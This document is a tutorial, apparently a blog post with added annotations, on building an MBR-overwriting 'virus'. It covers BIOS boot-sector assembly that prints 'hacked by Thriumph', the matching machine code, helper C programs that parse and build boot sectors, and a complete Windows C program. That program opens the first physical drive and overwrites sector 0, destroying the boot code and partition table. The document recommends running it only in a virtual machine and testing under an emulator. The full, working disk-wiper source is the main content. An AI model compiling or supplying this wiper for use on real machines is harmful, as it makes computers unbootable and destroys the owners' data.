Adapting an MBR boot-sector virus

Function

A simple "virus" (a fake one, it cannot spread) that overwrites the MBR so the machine can no longer boot 😬

MBR

The MBR is the hard disk's master boot record: cylinder 0, head 0, sector 1, also called the master boot sector. It is 512 bytes long (200h). When the machine boots from the disk, the BIOS reads this sector into memory at 0000:7C00h, checks that its last two bytes are 55h AAh, and jumps to it, so whatever code sits there gets control before the operating system does. The first 446 bytes (up to offset 1BEh) hold that boot code, the 64 bytes at 1BEh hold the four 16-byte partition table entries, and the final two bytes are the signature. This only applies to legacy BIOS (or CSM) boot: UEFI firmware does not execute the code in sector 0, so on a UEFI machine the message written below never appears.
How a computer boots: https://thriumph.top/windows%E5%90%AF%E5%8A%A8%E8%BF%87%E7%A8%8B.html
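An added example, not code from the original post, of reading a 512-byte sector and parsing it the way the BIOS and a partition tool see it: the boot signature at 1FEh, the four 16-byte partition entries at 1BEh, and a check for the state the program on this page leaves behind, a sector that still carries a valid signature but has an empty partition table. The sample MBR is constructed inline; mbr_read_sector0 can be pointed at a disk image or, as root, at a raw device such as /dev/sda. The function, type and macro names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MBR_SIZE        512
#define MBR_PT_OFFSET   0x1BE   /* partition table: 4 entries x 16 bytes */
#define MBR_SIG_OFFSET  0x1FE   /* 0x55 0xAA boot signature */

typedef struct {
    uint8_t  bootable;   /* 0x80 = active, 0x00 = inactive */
    uint8_t  type;       /* partition type id, e.g. 0x07 NTFS, 0xEE protective GPT */
    uint32_t lba_start;  /* first sector, little-endian on disk */
    uint32_t sectors;    /* length in sectors */
} mbr_part_t;

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Read the first 512 bytes of a disk image or raw device. Returns 0 on success. */
int mbr_read_sector0(const char *path, uint8_t *sec) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(sec, 1, MBR_SIZE, f);
    fclose(f);
    return n == MBR_SIZE ? 0 : -1;
}

int mbr_has_signature(const uint8_t *sec) {
    return sec[MBR_SIG_OFFSET] == 0x55 && sec[MBR_SIG_OFFSET + 1] == 0xAA;
}

/* Parse the four entries; returns how many are in use (type != 0). */
int mbr_parse_partitions(const uint8_t *sec, mbr_part_t out[4]) {
    int used = 0;
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = sec + MBR_PT_OFFSET + 16 * i;
        out[i].bootable  = e[0];
        out[i].type      = e[4];
        out[i].lba_start = le32(e + 8);
        out[i].sectors   = le32(e + 12);
        if (out[i].type != 0) used++;
    }
    return used;
}

/* A sector with a valid signature but no partition entries is what the page's
 * payload leaves behind: the BIOS still executes it, but every volume is gone. */
int mbr_looks_wiped(const uint8_t *sec) {
    mbr_part_t p[4];
    return mbr_has_signature(sec) && mbr_parse_partitions(sec, p) == 0;
}

/* Constructed sample: one active NTFS partition at LBA 2048, 0x100000 sectors long. */
void build_sample_mbr(uint8_t *sec) {
    memset(sec, 0, MBR_SIZE);
    uint8_t *e = sec + MBR_PT_OFFSET;
    e[0] = 0x80; e[4] = 0x07;
    e[8]  = 0x00; e[9]  = 0x08; e[10] = 0x00; e[11] = 0x00;   /* LBA 2048 */
    e[12] = 0x00; e[13] = 0x00; e[14] = 0x10; e[15] = 0x00;   /* 0x100000 sectors */
    sec[MBR_SIG_OFFSET] = 0x55; sec[MBR_SIG_OFFSET + 1] = 0xAA;
}

int main(int argc, char **argv) {
    uint8_t sec[MBR_SIZE];
    mbr_part_t p[4];
    if (argc > 1) {
        if (mbr_read_sector0(argv[1], sec) != 0) { perror(argv[1]); return 1; }
    } else {
        build_sample_mbr(sec);
    }
    int n = mbr_parse_partitions(sec, p);
    printf("signature: %s, partitions in use: %d, wiped: %s\n",
           mbr_has_signature(sec) ? "ok" : "missing", n, mbr_looks_wiped(sec) ? "yes" : "no");
    for (int i = 0; i < 4; i++)
        if (p[i].type)
            printf("  #%d boot=%02X type=%02X lba=%u len=%u\n", i, p[i].bootable, p[i].type,
                   (unsigned)p[i].lba_start, (unsigned)p[i].sectors);
    return 0;
}
```

Run without arguments it parses the constructed sample; with a path it parses sector 0 of that file or device, which is the quickest way to confirm whether a disk still has a usable partition table after the program below has run.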

How the virus works

1. Prepare the MBR to write.
2. Elevate the process. The program below enables SeDebugPrivilege before calling CreateFile on the physical drive. What the open actually requires is an elevated administrator token: the device object for \\.\PHYSICALDRIVE0 is protected by an ACL that grants write access to Administrators, and AdjustTokenPrivileges can only enable privileges the token already holds, so the debug privilege is not what decides the outcome. If CreateFile fails with ERROR_ACCESS_DENIED (5), the program was not run as administrator and the MBR can be neither read nor written.
3. Write the MBR; the new code then gets control before the operating system does.

Assembly source

assume cs:code
code segment
start:
mov ax,12h ;AH = 00h set video mode, AL = 12h (640x480, 16 colours); this also clears the screen
int 10h
mov bp,7C18H ;ES:BP -> string; the 24-byte stub is loaded at 7C00h, so the string that follows it is at 7C18h
             ;(relies on ES = 0 at entry, which BIOSes leave in practice but do not guarantee)
mov cx,13h ;string length, 19 characters
mov ax,1301h ;AH = 13h write string, AL = 01h: characters only, attribute in BL, advance cursor
mov bx,0Ch ;BH = 00h video page, BL = 0Ch attribute (light red on black)
mov dx,0h ;DH = row 0, DL = column 0
int 10h
jmp $ ;infinite loop (EB FE) so execution never falls through into the string bytes
code ends
end start

Getting the machine code

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE
That is 24 bytes (18h), which is why the string offset above is 7C18h. The string to display is appended right after it, here "hacked by Thriumph" as used in the array below:
68 61 63 6B 65 64 20 62 79 20 54 68 72 69 75 6D 70 68
The rest of the sector is zero-filled and the last two bytes must be 55 AA, the boot signature the BIOS checks before it will execute the sector.
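The offsets above (7C18h for the string, 13h for its length) were computed by hand from the 24-byte stub. As an added example that is not part of the original page, the following C builds the full 512-byte sector from that stub and an arbitrary message: it patches the two immediates, places the 55 AA signature at bytes 510 and 511, and refuses a message that would run into the partition table area at 1BEh. Like the page's stub it assumes the BIOS leaves ES = 0 when it jumps to 7C00h; the function and macro names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR    512
#define LOAD_ADDR 0x7C00   /* BIOS loads the boot sector here before jumping to it */
#define PT_OFFSET 0x1BE    /* partition table starts here; code and data must stay below */

/* The stub from the page, with the immediates for BP (offset 6) and CX (offset 9)
 * left as placeholders that build_boot_sector() patches. */
static const uint8_t stub[] = {
    0xB8, 0x12, 0x00,   /* mov ax,0012h   ; AH=00 set video mode, AL=12h */
    0xCD, 0x10,         /* int 10h */
    0xBD, 0x00, 0x00,   /* mov bp,imm16   ; string offset (patched) */
    0xB9, 0x00, 0x00,   /* mov cx,imm16   ; string length (patched) */
    0xB8, 0x01, 0x13,   /* mov ax,1301h   ; AH=13h write string, AL=01 */
    0xBB, 0x0C, 0x00,   /* mov bx,000Ch   ; page 0, attribute light red */
    0xBA, 0x00, 0x00,   /* mov dx,0000h   ; row 0, column 0 */
    0xCD, 0x10,         /* int 10h */
    0xEB, 0xFE,         /* jmp $ */
};
#define BP_IMM 6
#define CX_IMM 9

/* Fill sec (512 bytes) with a boot sector that prints msg. Returns 0, or -1 if the
 * message is empty or would overlap the partition table. */
int build_boot_sector(const char *msg, uint8_t *sec) {
    size_t len = strlen(msg);
    size_t str_off = sizeof stub;                 /* 24 = 0x18 for this stub */
    if (len == 0 || str_off + len > PT_OFFSET) return -1;
    memset(sec, 0, SECTOR);
    memcpy(sec, stub, sizeof stub);
    uint16_t bp = (uint16_t)(LOAD_ADDR + str_off); /* 0x7C18 for this stub */
    sec[BP_IMM]     = (uint8_t)(bp & 0xFF);
    sec[BP_IMM + 1] = (uint8_t)(bp >> 8);
    sec[CX_IMM]     = (uint8_t)(len & 0xFF);
    sec[CX_IMM + 1] = (uint8_t)((len >> 8) & 0xFF);
    memcpy(sec + str_off, msg, len);
    sec[510] = 0x55;                              /* boot signature */
    sec[511] = 0xAA;
    return 0;
}

int main(int argc, char **argv) {
    uint8_t sec[SECTOR];
    const char *msg = argc > 1 ? argv[1] : "hacked by Thriumph ";
    if (build_boot_sector(msg, sec) != 0) {
        fputs("message empty or too long for the boot code area\n", stderr);
        return 1;
    }
    FILE *f = fopen("mbr.bin", "wb");
    if (!f) { perror("mbr.bin"); return 1; }
    fwrite(sec, 1, SECTOR, f);
    fclose(f);
    printf("wrote mbr.bin: string at %04Xh, %zu bytes\n",
           LOAD_ADDR + (unsigned)sizeof stub, strlen(msg));
    return 0;
}
```

Writing the sector to a file and booting it under an emulator (`qemu-system-i386 -drive format=raw,file=mbr.bin`) shows the message without touching a real disk, which is the only sensible way to test a sector like this.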

Writing the MBR boot-sector virus

The main program has two functions: one elevates privileges, the other writes the MBR. Note that the sector it writes is the stub, the message and zeros: it also overwrites the partition table at offset 1BEh, so besides replacing the boot code it makes the disk's partitions unfindable. Run it only inside a throwaway virtual machine.

#include<windows.h>
#include<winioctl.h>

// The sector to write: the 24-byte stub, the message, and zero padding. The 55 AA
// signature is set at bytes 510/511 in main() so it cannot end up at the wrong offset
// if the initializer is miscounted. Bytes 22-23 are EB FE ("jmp $") as in the
// assembly; the original array had E2 FE ("loop $"), which falls through into the
// string after CX iterations.
unsigned char temp[512] = {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,0x00,0xB8,0x01,0x13,0xBB,0x0C,0x00,0xBA,0x00,0x00,
0xCD,0x10,0xEB,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x54,0x68,0x72,0x69,0x75,
0x6D,0x70,0x68,0x20,0x20,0x20,0x20,0x20,0x20
// remaining bytes are zero-filled by the compiler
};

// Enables SeDebugPrivilege in the current token, as the original program does. This is
// not what makes the CreateFile below succeed: AdjustTokenPrivileges can only enable
// privileges the token already holds, and the physical drive's ACL grants write access
// to Administrators, so the process has to run elevated regardless.
BOOL GetPrivileges()
{
HANDLE hTokenHandle;
TOKEN_PRIVILEGES tp;
// GetCurrentProcess() returns a pseudo-handle, so nothing has to be closed for it
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle))
return FALSE;
// look up the LUID of the privilege and ask for it to be enabled
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid))
{
CloseHandle(hTokenHandle);
return FALSE;
}
// AdjustTokenPrivileges returns TRUE even when it enabled nothing; GetLastError tells
AdjustTokenPrivileges(hTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
BOOL ok = (GetLastError() == ERROR_SUCCESS);
CloseHandle(hTokenHandle);
return ok;
}

// Opens "\\\\.\\PHYSICALDRIVE0" and overwrites sector 0 with temp. The original named
// this ReadPHYSICALDRIVE0 although it only writes.
BOOL WritePHYSICALDRIVE0()
{
HANDLE hFile;
DWORD dwWritten = 0;
char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
// share flags are needed because the volume stack already has the disk open
hFile = CreateFileA(str_Name, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
// GetLastError() == 5 (ERROR_ACCESS_DENIED) means the process is not elevated
MessageBoxA(0, "CreateFile on PHYSICALDRIVE0 failed (not running as administrator?)", "wrong", 0);
return FALSE;
}
// A careful tool would ReadFile the existing sector here and keep it as a backup;
// this program does not, so the partition table is lost together with the boot code.
BOOL ok = WriteFile(hFile, temp, 512, &dwWritten, NULL) && dwWritten == 512;
CloseHandle(hFile);
return ok;
}

int main()
{
temp[510] = 0x55; // boot signature the BIOS checks before executing the sector
temp[511] = 0xAA;
GetPrivileges();
// destroys the boot code and partition table of the first disk: VM only
return WritePHYSICALDRIVE0() ? 0 : 1;
}